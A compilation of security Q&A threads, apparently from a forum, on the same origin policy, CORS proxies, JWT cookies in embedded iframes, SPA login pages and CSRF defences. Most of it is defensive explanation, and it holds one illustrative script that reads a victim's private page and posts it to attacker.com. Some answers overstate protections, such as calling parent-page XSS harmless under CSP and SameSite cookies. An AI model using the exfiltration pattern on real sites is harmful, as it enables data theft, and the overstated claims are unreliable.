Why do browsers apply the same origin policy to XMLHttpRequest? It's really inconvenient for developers, but it seems to do little to actually stop attackers.
There are workarounds: pages can still include JavaScript from outside sources (the mechanism behind JSONP).
It seems like an outdated "feature" in a web that's largely interlinked.
Because an XMLHttpRequest passes the user's authentication tokens. If the user were logged onto example.com with basic auth or some cookies, then visited attacker.com, the latter site could create an XMLHttpRequest to example.com with full authorisation for that user and read any private page that the user could (then forward it back to the attacker).
And because secret tokens embedded in web-app pages are the standard way to stop simple cross-site request forgery attacks, a readable cross-origin response would let attacker.com extract those tokens and then take any on-page action the user could at example.com, without any consent or interaction from them. Global XMLHttpRequest would be global cross-site scripting.
(Even if you had a version of XMLHttpRequest that didn't pass authentication, there would still be problems. For example, an attacker could make requests out to other non-public machines on your intranet and read any files it can download from them, files which may not be meant for public consumption. <script> tags already suffer from a limited form of this kind of vulnerability, but the fully readable responses of XMLHttpRequest would leak all kinds of files, instead of only a few unfortunately crafted ones that happen to parse as JavaScript.)
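As a rough illustration of the first point, here is a hypothetical sketch (written with fetch for brevity) of what any page could do if browsers let scripts read cross-origin responses; the domains match the example above and the path is a placeholder.

```typescript
// Hypothetical: only works in a world without the same origin policy.
async function stealPrivatePage(): Promise<void> {
  // The browser would attach the victim's example.com cookies automatically.
  const resp = await fetch("https://example.com/account/settings", {
    credentials: "include",
  });
  const privateHtml = await resp.text(); // in real browsers, reading this is blocked
  // Forward the private content to the attacker's own server.
  await fetch("https://attacker.com/collect", { method: "POST", body: privateHtml });
}
```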
I have a product that requires sign-in authentication. I use JWT, but store it inside cookies (which I know could be a problem once there is an XSS vulnerability).
This product is also given to some "other domains" that embed it through an iframe.
I'm curious if there are any security risks that I did not think about in this situation.
E.g. does the parent "other domain" have access to my authentication tokens, since I use cookies to store my JWT tokens? And if the parent has an XSS vulnerability, would that automatically imply a vulnerability for me as well?
I have a product that requires sign-in authentication. I use JWT, but store it inside cookies (which I know could be a problem once there is an XSS vulnerability)
Storing it in a cookie is not a problem nowadays. By using cookie attributes and headers like SameSite, HttpOnly and a Content-Security-Policy, XSS becomes much harder to exploit: an attacker may manage to pop up an alert box, but they cannot steal the cookies, which should give you some confidence in using them. It really depends on how you code each piece of functionality. If you are using frameworks with built-in escaping (like Jinja, Vue, Angular, EJS, etc.), there is a very low chance for an attacker to inject code.
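As a minimal sketch of that hardening (Express is just an example framework here, and the endpoint and values are hypothetical), the server sets the JWT cookie with HttpOnly and SameSite attributes and sends a CSP header:

```typescript
import express from "express";

const app = express();

// Hypothetical login handler: the cookie attributes are the point, not the framework.
app.post("/login", (_req, res) => {
  const jwt = "<signed-jwt-from-your-auth-logic>"; // placeholder
  res.cookie("session", jwt, {
    httpOnly: true,   // script cannot read it, so XSS cannot simply exfiltrate it
    secure: true,     // only sent over HTTPS
    sameSite: "lax",  // not attached to most cross-site requests
  });
  // A restrictive CSP makes injected scripts much harder to run in the first place.
  res.setHeader("Content-Security-Policy", "default-src 'self'");
  res.sendStatus(204);
});

app.listen(3000);
```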
This product is also given to some "other domains" that embed it through an iframe
If the parent domain has an XSS vulnerability, then the iframe is probably affected by it as well: the injected script can see the content and send it to the attacker's domain. There is a tool called xsshunter.io you can use to check this by testing it on a development server. But if you use CSP and SameSite=Lax cookies, it's not a problem: there will be no communication to external domains other than the whitelisted ones.
If your concern is vertical privilege escalation from the child to the parent, there is a great feature for that: the sandbox attribute on the iframe (see the sketch after the list below). Its possible values are:
(no value): Applies all restrictions
allow-forms: Allows form submission
allow-modals: Allows opening modal windows
allow-orientation-lock: Allows locking the screen orientation
allow-pointer-lock: Allows use of the Pointer Lock API
allow-popups: Allows popups
allow-popups-to-escape-sandbox: Allows popups to open new windows without inheriting the sandboxing
allow-presentation: Allows starting a presentation session
allow-same-origin: Allows the iframe content to be treated as being from the same origin
allow-scripts: Allows running scripts
allow-top-navigation: Allows the iframe content to navigate its top-level browsing context
allow-top-navigation-by-user-activation: Allows the iframe content to navigate its top-level browsing context, but only if initiated by the user
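For instance, the embedding page can apply a locked-down sandbox like this; a minimal sketch with a hypothetical embed URL, granting only what the framed product actually needs:

```typescript
// Embed the product in a sandboxed iframe, granting only the needed capabilities.
const frame = document.createElement("iframe");
frame.src = "https://embedded-product.example/widget"; // hypothetical embed URL
frame.setAttribute("sandbox", "allow-scripts allow-forms");
// Deliberately omitting allow-same-origin: the framed document is then treated
// as a unique origin and cannot use its cookies/storage as if it were un-sandboxed.
document.body.appendChild(frame);
```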
It is good practice to send the JWT in a header. There is no problem at all with using it in a cookie, but sending it in a header is generally the more secure option.
Hope this helps!
I've read an article which used Cors-Anywhere to make an example url request, and it made me think about how easily the Same Origin Policy can be bypassed.
While the browser prevents you from accessing the response directly, and cancels the request altogether when it doesn't pass a preflight request, a simple node server does not need to abide by such rules, and can be used as a proxy.
All that needs to be done is to prepend 'https://cors-anywhere.herokuapp.com/' to the requested URL in the malicious script and voilà, you don't need to pass CORS.
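Concretely, the trick looks roughly like this (the target URL is a placeholder; the proxy is the public instance named above):

```typescript
// The proxy fetches the target server-side and answers with permissive CORS
// headers, so the browser happily lets the page read the response.
const target = "https://api.example.org/some/endpoint"; // placeholder target
const proxied = `https://cors-anywhere.herokuapp.com/${target}`;

async function viaProxy(): Promise<string> {
  const resp = await fetch(proxied); // note: the user's cookies for the target are NOT sent
  return resp.text();
}
```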
And as sideshowbarker pointed out, it takes a couple of minutes to deploy your own Cors-Anywhere server.
Doesn't it make SOP as a security measure pretty much pointless?
The purpose of the SOP is to segregate data stored in browsers by their origin. If you got a cookie from domain1.tld (or it stored data for you in a browser store), Javascript on domain2.tld will not be able to gain access. This cannot be circumvented by any server-side component, because that component will still not have access in any way. If there was no SOP, a malicious site could just read any data stored by other websites in your browsers.
Now this is also related to CORS, as you somewhat correctly pointed out. Normally, your page's JavaScript will not get to read the response of a request made to a different origin than the one it's running on. The purpose of this is that if it could, you could gain information from sites where the user is logged in. If you send the request through Cors-Anywhere though, you will not be able to send the user's session cookie for the other site, because you still don't have access to it; the request goes to your own server acting as the proxy.
Where Cors-Anywhere matters is unauthenticated APIs. Some APIs might check the origin header and only respond to their own client domain. In that case, sure, Cors-Anywhere can add or change CORS headers so that you can query it from your own hosted client. But the purpose of SOP is not to prevent this, and even in this case, it would be a lot easier for the API owner to blacklist or throttle your requests, because they are all proxied by your server.
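For that unauthenticated-API case, the Origin check being described is only a few lines of server code; a hypothetical sketch (framework and domain names assumed):

```typescript
import express from "express";

const app = express();

// Hypothetical allow-list: reflect CORS headers only for the known client origin.
const allowed = new Set(["https://app.example.com"]);

app.use((req, res, next) => {
  const origin = String(req.headers.origin ?? "");
  if (allowed.has(origin)) {
    res.setHeader("Access-Control-Allow-Origin", origin);
  }
  next();
});

app.get("/public-data", (_req, res) => {
  res.json({ ok: true });
});

app.listen(3000);
// A proxy like Cors-Anywhere is simply not bound by this: it makes the request
// server-side (with whatever Origin it likes) and adds its own CORS headers.
```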
So in short, SOP and CORS are not access control mechanisms in the sense I think you meant. Their purpose is to prevent and/or securely allow cross-origin requests to certain resources, but they are not meant to, say, prevent server-side components from making requests, or to authenticate your client-side JavaScript itself (which is not technically possible).
My understanding is that, if you include your login page in your SPA, then the user is receiving all of your code before they're even authenticated. And yet, it seems to be a very common practice. Isn't this incredibly insecure?? Why or why not?
An SPA would have all the page structures (html and javascript code for the design of pages), but obviously not data. Data would be downloaded in subsequent ajax requests, and that is the point. To download actual data, a user would have to be authenticated to the server, and all security would then be implemented server-side. An unauthorized user should not be able to access data from the server. But the idea is that how pages look is not a secret, anybody can have a look at pages of the SPA without data, and that's fine.
Well, and here comes the catch that people often overlook. HTML is one thing, but there is all the JavaScript in an SPA that can access all the data. Basically, the code of the SPA is API documentation if you like, a list of possible queries that the backend can handle. Sure, it should all be secure server-side, but that's not always the case; people make mistakes. With the "documentation" that an SPA effectively is, it can be much easier for an attacker to evaluate server-side security and find authorization / access-control flaws in server-side code, which may enable access to data that should not be accessible to the attacker.
So in short, having access to how pages look (without data) should be ok. However, giving away how exactly the API works can in certain scenarios help an attacker, and therefore adds some risk, which is inherent to SPAs.
It must be noted though that it should not matter. As security by obscurity should not be used (ie. it should not be a secret how things work, only things like credentials should be secrets), it should be fine to let anyone know all the javascript, or the full API documentation. However, the real world is not always so idealistic. Often attackers don't know how stuff works, and it can be of real help to be able to for example analyze an SPA, because people that write the backend code do make mistakes. In other cases the API is public and documented anyway, in which case having an SPA presents no further risk.
If you put the SPA behind authentication (only authenticated users can download the SPA code), that complicates CDN access a lot, though some content delivery networks do support some level of authentication I think.
Yet there is a real benefit to having a separate (plain old HTML) login page outside the SPA. If you have the login page in the SPA, you can only get an access token (session id, whatever) in JavaScript, which means it will be accessible to JavaScript, and you can only store it in localStorage or a plain non-httpOnly cookie. This may easily result in the authentication token being stolen via cross-site scripting (XSS). A more secure option is to have a separate login page, which sets the authentication token as an httpOnly cookie, inaccessible to any JavaScript, and as such, safe from XSS. Note though that this brings the risk of CSRF, which you will then have to deal with, as opposed to the token/session id being sent as something like a request header.
In many cases, having the login in the SPA and storing the authentication token in localStorage is acceptable, but this should be an informed decision, and you should be aware of the risk (XSS, vs CSRF in the other case).
It's clear that data loaded into an SPA must be secured behind an API through authn. But I think you can also secure layout so it is "less ok" having access to how pages look. With metamodel-driven development, you can serve layout configuration from a secured API. I am not talking about serving HTML (that's SSR), I am talking about serving JSON. That layout configuration is nothing but a JSON file on the server defining the content of your screen (fully or partially). Then your SPA code turns into a generic interpreter/render of that metamodel that parses the payload, renders components and binds data. If your API is L3, voilà, you get a fully working API-driven app.
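As a loose illustration of that idea (the shape of the metamodel below is entirely made up), the secured API returns the layout as JSON and the SPA ships only a generic interpreter:

```typescript
// Hypothetical metamodel returned by a secured endpoint such as /api/screens/:id.
interface ScreenModel {
  title: string;
  components: Array<
    | { kind: "text"; bind: string }
    | { kind: "table"; source: string; columns: string[] }
  >;
}

// Generic interpreter: no screen-specific layout knowledge ships in the SPA bundle.
async function renderScreen(screenId: string): Promise<void> {
  const resp = await fetch(`/api/screens/${screenId}`, { credentials: "include" });
  const model: ScreenModel = await resp.json();
  document.title = model.title;
  for (const component of model.components) {
    // ...instantiate the matching generic component and bind its data source
    console.log("render", component.kind);
  }
}
```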
Is CSRF possible with PUT or DELETE methods? Or does the use of PUT or DELETE prevent CSRF?
Great question!
In a perfect world, I can't think of a way to perform a CSRF attack.
You cannot make PUT or DELETE requests using HTML forms.
Images, Script tags, CSS Links etc all send GET requests to the server.
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets will block cross-domain requests.
So, in general, it shouldn't be possible to make a CSRF attack to a resource that supports PUT/DELETE verbs.
That said, the world isn't perfect. There may be several ways in which such an attack can be made possible:
Web frameworks such as Rails have support for a "pseudo method". If you put a hidden field called _method, set its value to PUT or DELETE, and then submit a GET or POST request, it will override the HTTP verb. This is a way to support PUT or DELETE from browser forms. If you are using such a framework, you will have to protect yourself from CSRF using the standard techniques (see the sketch after this list).
You may accidentally set up lax CORS response headers on your server. This would allow arbitrary websites to make PUT and DELETE requests.
At some point, HTML5 had planned to include support for PUT and DELETE in HTML Forms. But later, they removed that support. There is no guarantee that it won't be added later. Some browsers may actually have support for these verbs, and that can work against you.
There may just be a bug in some browser plugin that could allow the attacker to make PUT/DELETE requests.
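To make the first point concrete, here is a simplified sketch of such a method override, written as an Express-style middleware in TypeScript rather than Rails itself; it shows why an ordinary cross-site POST form can end up hitting a DELETE handler:

```typescript
import express from "express";

const app = express();
app.use(express.urlencoded({ extended: false }));

// Simplified "_method" override, similar in spirit to the Rails pseudo method:
// a plain <form method="post"> containing a hidden <input name="_method"
// value="DELETE"> ends up being routed as a DELETE.
app.use((req, _res, next) => {
  const override = req.body?._method;
  if (req.method === "POST" && typeof override === "string") {
    req.method = override.toUpperCase(); // a simple cross-site form now reaches DELETE routes
  }
  next();
});

app.delete("/items/:id", (req, res) => {
  res.send(`deleted ${req.params.id}`); // so this must still carry CSRF protection
});

app.listen(3000);
```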
In short, I would recommend protecting your resources even if they only support PUT and DELETE methods.
Yes, CSRF is possible with the PUT and DELETE methods, but only with CORS enabled with an unrestrictive policy.
I disagree with Sripathi Krishnan's answer:
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets will block cross-domain requests
Nothing stops the browser from making a cross-domain request. The Same Origin Policy does not prevent a request from being made - all it does is prevent the request from being read by the browser.
A cross-origin PUT or DELETE will cause a preflight request to be made, and if the server does not opt into CORS for it, the actual request is never sent. This is the mechanism that prevents a PUT or DELETE from being used, because they are not simple requests (for a simple request the method needs to be HEAD, GET or POST). That assumes a properly locked-down CORS policy of course (or none at all, which is secure by default).
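To see that in action, here is a sketch (hypothetical URL) of attacker-page JavaScript attempting a cross-origin PUT; because PUT is not a simple method, the browser preflights it first, and without CORS approval the PUT itself is never sent:

```typescript
// Rejected by the browser unless victim.example answers the OPTIONS preflight
// with Access-Control-Allow-* headers permitting this method and origin.
async function attemptCrossOriginPut(): Promise<void> {
  await fetch("https://victim.example/api/profile", {
    method: "PUT",
    credentials: "include",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ displayName: "attacker-chosen" }),
  });
}
```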
No. Relying on an HTTP verb is not a way to prevent a CSRF attack. It's all in how your site is created. You can use PUTs as POSTs and DELETEs as GETs - it doesn't really matter.
To prevent CSRF, take some of the steps outlined here:
Web sites have various CSRF countermeasures available:
Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the right token in its submissions.
Requiring the client to provide authentication data in the same HTTP request used to perform any operation with security implications (money transfer, etc.).
Limiting the lifetime of session cookies.
Checking the HTTP Referer header and/or the HTTP Origin header[16].
Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls[17].
Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies[18].
Verifying that the request's headers contain X-Requested-With (used by Ruby on Rails before v2.0 and Django before v1.2.5). This protection has been proven insecure[19] under a combination of browser plugins and redirects which can allow an attacker to provide custom HTTP headers on a request to any website, hence allowing a forged request.
In theory it should not be possible as there is no way to initiate a cross-domain PUT or DELETE request (except for CORS, but that needs a preflight request and thus the target site's cooperation). In practice I would not rely on that - many systems have been bitten by e.g. assuming that a CSRF file upload attack was not possible (it should not be, but certain browser bugs made it possible).
CSRF is indeed possible with PUT and DELETE depending on the configuration of your server.
The easiest way to think about CSRF is to think of having two tabs open in your browser, one open to your application with your user authenticated, and the other tab open to a malicious website.
If the malicious website makes a javascript request to your application, the browser will send the standard cookies with the request, thus allowing the malicious website to 'forge' the request using the already authenticated session. That website can do any type of request that it wants to, including GET, PUT, POST, DELETE, etc.
The standard way to defend against CSRF is to send something along with the request that the malicious website cannot know. This can be as simple as the contents of one of the cookies. While the request from the malicious site will have the cookies sent with it, it cannot actually access the cookies, because it is being served from a different domain and browser security prevents it from accessing the cookies of another domain.
Call the cookie content a 'token'. You can send the token along with requests, and on the server, make sure the 'token' has been correctly provided before proceeding with the request.
The next question is how you send that value with all the different requests, with DELETE being particularly awkward since it is not designed to carry any kind of payload. In my opinion, the cleanest way is to specify a request header carrying the token, something like x-security-token: <token>. That way, you can look at the headers of incoming requests and reject any that are missing the token.
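A minimal client-side sketch of that pattern, using the improvised header name from above and hypothetical cookie/route names; the server would compare the header to the cookie and reject mismatches:

```typescript
// Read the (non-HttpOnly) token cookie and echo it in a custom header.
// A page on another origin cannot read this cookie, so it cannot forge the header.
function readCookie(name: string): string {
  const match = document.cookie.match(new RegExp(`(?:^|; )${name}=([^;]*)`));
  return match ? decodeURIComponent(match[1]) : "";
}

async function deleteItem(id: string): Promise<void> {
  await fetch(`/api/items/${id}`, {
    method: "DELETE",
    headers: { "x-security-token": readCookie("csrf_token") }, // server checks this
  });
}
```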
In the past, standard AJAX security restricted what a malicious site could do via AJAX; nowadays, however, the exposure depends on how your server is set up with regard to access-control configuration. Some people open up their server to make cross-domain calls easier, or to let users build their own RESTful clients and the like, but that also makes it easier for a malicious site to take advantage, unless CSRF prevention methods like the ones above are put in place.
What changes to the HTTP protocol spec, and to browser behaviour, would be required to prevent dangerous cases of cross-site request forgery?
I am not looking for suggestions as to how to patch my own web app. There are millions of vulnerable web apps and forms. It would be easier to change HTTP and/or the browsers.
If you agree to my premise, please tell me what changes to the HTTP and/or browser behaviour are needed. This is not a competition to find the best single answer, I want to collect all the good answers.
Please also read and comment on the points in my 'answer' below.
Roy Fielding, author of the HTTP specification, disagrees with your opinion that CSRF is a flaw in HTTP that would need to be fixed there. As he wrote in a reply in a thread named The HTTP Origin Header:
CSRF is not a security issue for the Web. A well-designed Web service should be capable of receiving requests directed by any host, by design, with appropriate authentication where needed. If browsers create a security issue because they allow scripts to automatically direct requests with stored security credentials onto third-party sites, without any user intervention/configuration, then the obvious fix is within the browser.
And in fact, CSRF attacks were possible right from the beginning using plain HTML. The introduction of later technologies like JavaScript and CSS only added further attack vectors and techniques that made request forging easier and more efficient.
But that didn't change the fact that a legitimate and authentic request from a client is not necessarily based on the user's intention, because browsers send requests automatically all the time (e.g. images, style sheets) and send any authentication credentials along with them.
Again, CSRF attacks happen inside the browser, so the only possible fix would need to be to fix it there, inside the browser.
But as that is not entirely possible (see above), it's the application's duty to implement a scheme that allows it to distinguish between authentic and forged requests. The widely promoted CSRF token is such a technique. And it works well when implemented properly and protected against other attacks (many of them, again, only possible due to the introduction of modern technologies).
I agree with the other two; this could be done on the browser side, but it would make it impossible to perform authorized cross-site requests.
Anyway, a CSRF protection layer could be added quite easily on the application side (and maybe even on the web-server side, in order to avoid making changes to pre-existing applications) using something like this:
A cookie is set to a random value, known only by the server (and, of course, the client receiving it, but not a third-party server).
Each POST form must contain a hidden field whose value must be the same as the cookie's. If it is not, form submission must be prevented and a 403 page returned to the user.
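A server-side sketch of that double-submit scheme; the framework, cookie name and field name here are only examples:

```typescript
import { randomBytes } from "node:crypto";
import express from "express";

const app = express();
app.use(express.urlencoded({ extended: false }));

// Set a random token cookie if the client does not have one yet.
app.use((req, res, next) => {
  if (!(req.headers.cookie ?? "").includes("csrf=")) {
    res.cookie("csrf", randomBytes(16).toString("hex"));
  }
  next();
});

// On POST, require the hidden form field to match the cookie, otherwise return 403.
app.post("/transfer", (req, res) => {
  const cookieToken = /(?:^|; )csrf=([^;]*)/.exec(req.headers.cookie ?? "")?.[1];
  if (!cookieToken || req.body.csrf !== cookieToken) {
    res.status(403).send("CSRF token mismatch");
    return;
  }
  res.send("ok");
});

app.listen(3000);
```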
Enforce the Same Origin Policy for form submission locations. Only allow a form to be submitted back to the place it came from.
This, of course, would break all sorts of other things.
If you look at the CSRF prevention cheat sheet you can see that there are ways of preventing CSRF by relying upon the HTTP protocol. A good example is checking the HTTP referer which is commonly used on embedded devices because it doesn't require additional memory.
However, this is a weak form of protection. A vulnerability like HTTP response splitting on the client side could be used to influence the Referer value, and this has happened.
cookies should be declared 'local' (default) or 'remote'
the browser must not send 'local' cookies with a cross-site request
the browser must never send http-auth headers with a cross-site request
the browser must not send a cross-site POST or GET ?query without permission
the browser must not send LAN address requests from a remote page without permission
the browser must report and control attacks, where many cross-site requests are made
the browser should send 'Origin: (local|remote)', even if 'Referer' is disabled
other common web security issues such as XSHM should be addressed in the HTTP spec
a new HTTP protocol version 1.2 is needed, to show that a browser is conforming
browsers should update automatically to meet new security requirements, or warn the user
It can already be done:
Referer header
This is a weaker form of protection. Some users may disable referer for privacy purposes, meaning that they won't be able to submit such forms on your site. Also this can be tricky to implement in code. Some systems allow a URL such as http://example.com?q=example.org to pass the referrer check for example.org. Finally, any open redirect vulnerabilities on your site may allow an attacker to send their CSRF attack through the open redirect in order to get the correct referer header.
Origin header
This is a new header. Unfortunately you will get inconsistencies between browsers that support it and those that do not. See this answer.
Other headers
For AJAX requests only, adding a header that is not allowed cross domain such as X-Requested-With can be used as a CSRF prevention method. Old browsers will not send XHR cross domain and new browsers will send a CORS preflight instead and then refuse to make the main request if it is explicitly not allowed by the target domain. The server-side code will need to ensure that the header is still present when the request is received. As HTML forms cannot have custom headers added, this method is incompatible with them. However, this also means that it protects against attackers using an HTML form in their CSRF attack.
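A sketch of that server-side check (the header value shown is the conventional one; framework and routes are just examples):

```typescript
import express from "express";

const app = express();

// Reject state-changing requests that lack the custom header. HTML forms cannot
// set it, and cross-origin XHR/fetch cannot add it without a CORS preflight
// that this server never approves.
app.use((req, res, next) => {
  const stateChanging = !["GET", "HEAD", "OPTIONS"].includes(req.method);
  if (stateChanging && req.headers["x-requested-with"] !== "XMLHttpRequest") {
    res.status(403).send("Missing X-Requested-With");
    return;
  }
  next();
});

app.listen(3000);
```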
Browsers
Browsers such as Chrome allow third-party cookies to be blocked. Although the explanation says that it will stop cookies from being set by a third-party domain, it also prevents any existing cookies from being sent with such requests. This will block "background" CSRF attacks. Attacks that open a full page or a popup will still succeed, but will be more visible to the user.